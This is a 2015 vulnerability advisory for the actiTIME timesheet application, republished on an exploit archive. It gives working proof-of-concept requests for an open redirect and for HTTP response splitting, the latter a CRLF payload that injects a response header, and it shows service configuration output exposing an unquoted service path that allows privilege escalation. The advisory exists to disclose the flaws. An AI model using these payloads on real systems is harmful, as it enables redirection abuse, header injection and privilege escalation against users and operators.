actiTIME 2015.2 Privilege Escalation / Open Redirect

🗓️ 02 Nov 2015 00:00:00Reported by LiquidWormType

packetstorm🔗 packetstormsecurity.com👁 25 Views

actiTIME 2015.2 Multiple Vulnerabilities including Privilege Escalation and Open Redirec

`  
actiTIME 2015.2 Multiple Vulnerabilities  
  
  
Vendor: Actimind, Inc.  
Product web page: http://www.actitime.com  
Affected version: 2015.2 (Small Team Edition)  
  
Summary: actiTIME is a web timesheet software. It allows you to  
enter time spent on different work assignments, register time offs  
and sick leaves, and then create detailed reports covering almost  
any management or accounting needs.  
  
Desc: The application suffers from multiple security vulnerabilities  
including: Open Redirection, HTTP Response Splitting and Unquoted  
Service Path Elevation Of Privilege.  
  
Tested on: OS/Platform: Windows 7 6.1 for x86  
Servlet Container: Jetty/5.1.4  
Servlet API Version: 2.4  
Java: 1.7.0_76-b13  
Database: MySQL 5.1.72-community-log  
Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13  
Patch level: 28.0  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5273  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php  
  
  
13.10.2015  
  
--  
  
  
  
1. Open Redirect  
-----------------  
  
http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1  
  
  
2. HTTP Response Splitting  
---------------------------  
  
http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1  
  
Response:  
  
HTTP/1.1 302 Moved Temporarily  
Date: Wed, 14 Oct 2015 09:32:05 GMT  
Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76  
Content-Type: text/html;charset=UTF-8  
Cache-Control: no-store, no-cache  
Pragma: no-cache  
Expires: Tue, 09 Sep 2014 09:32:05 GMT  
X-UA-Compatible: IE=Edge  
Location: http://localhost/administration/  
Server: Waddup/2.0  
Content-Length: 0  
  
  
3. Unquoted Service Path Elevation Of Privilege  
------------------------------------------------  
  
C:\Users\joxy>sc qc actiTIME  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: actiTIME  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\actiTIME\actitime_access.exe startAsService  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : actiTIME Server  
DEPENDENCIES : actiTIME MySQL  
SERVICE_START_NAME : LocalSystem  
  
`

02 Nov 2015 00:00Current

0.3Low risk

Vulners AI Score0.3